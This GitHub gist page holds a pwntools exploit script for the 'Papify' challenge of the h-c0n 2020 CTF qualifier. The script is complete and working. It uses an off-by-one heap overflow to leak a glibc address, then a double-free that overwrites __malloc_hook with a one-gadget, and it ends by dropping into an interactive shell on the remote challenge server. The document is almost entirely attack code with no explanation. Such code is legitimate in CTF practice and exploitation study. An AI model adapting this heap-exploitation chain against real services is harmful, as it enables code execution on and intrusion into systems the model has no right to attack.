Skip to content

Instantly share code, notes, and snippets.

@KaoRz
Created January 20, 2020 01:04
Show Gist options
  • Save KaoRz/c885f53da9e8fa89a2f43fa6967d0ef3 to your computer and use it in GitHub Desktop.
Save KaoRz/c885f53da9e8fa89a2f43fa6967d0ef3 to your computer and use it in GitHub Desktop.
Papify exploit - h-c0n 2020 CTF qualifier
#!/usr/bin/env python3
# coding: utf-8
from pwn import *
context.terminal = ['tmux', 'sp', '-h']
#context.log_level = 'DEBUG'
HOST = "ctf.h-c0n.com"
PORT = 60003
elf = ELF("./chall")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec = False)
LOCAL = False
def add_paper(idx, size, data, shell = False):
io.recvuntil(">> ")
io.sendline("1")
io.recvuntil("index: ")
io.sendline(str(idx))
io.recvuntil("size: ")
io.sendline(str(size))
if shell == False:
io.recvuntil("content: ")
io.sendline(data)
def edit_paper(idx, pos, data):
io.recvuntil(">> ")
io.sendline("2")
io.recvuntil("index: ")
io.sendline(str(idx))
io.recvuntil("fix?: ")
io.sendline(str(pos))
io.recvuntil("content: ")
io.sendline(data)
def delete_paper(idx):
io.recvuntil(">> ")
io.sendline("3")
io.recvuntil("index: ")
io.sendline(str(idx))
def print_paper(idx):
io.recvuntil(">> ")
io.sendline("4")
io.recvuntil("index: ")
io.sendline(str(idx))
if LOCAL == True:
io = process(elf.path)
else:
io = remote(HOST, PORT)
for _ in range(7):
add_paper(0, 0x100, "")
delete_paper(0)
add_paper(0, 0x108, "")
add_paper(1, 0x100, "")
add_paper(2, 0x10, "") # Barrier
delete_paper(1) # Send chunk to unsorted bin
edit_paper(0, 0x108, b"\x13") # Trigger off-by-one (overwrite IS_MMAPPED bit)
add_paper(1, 0x100, "A" * 7)
print_paper(1)
io.recvuntil("A" * 7 + "\n", drop = True)
libc_leak = u64(io.recvuntil("\nDone.", drop = True).ljust(8, b"\x00"))
libc.address = libc_leak - 0x1e4ca0
log.success("Leaked GLIBC arena address: " + hex(libc_leak))
log.info("GLIBC base address: " + hex(libc.address))
log.info("__malloc_hook@@GLIBC address: " + hex(libc.sym['__malloc_hook']))
log.info("One gadget GLIBC address: " + hex(libc.address + 0x106ef8))
for _ in range(7):
add_paper(0, 0x68, "")
delete_paper(0)
add_paper(0, 0x68, "")
add_paper(1, 0x68, "")
delete_paper(0)
delete_paper(1)
delete_paper(0)
add_paper(0, 0x68, p64(libc.sym['__malloc_hook'] - 0x23))
add_paper(0, 0x68, "")
add_paper(0, 0x68, "")
add_paper(0, 0x68, b'\x00' * 0x13 + p64(libc.address + 0x106ef8))
add_paper(1, 1, "", shell = True)
io.interactive()
io.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment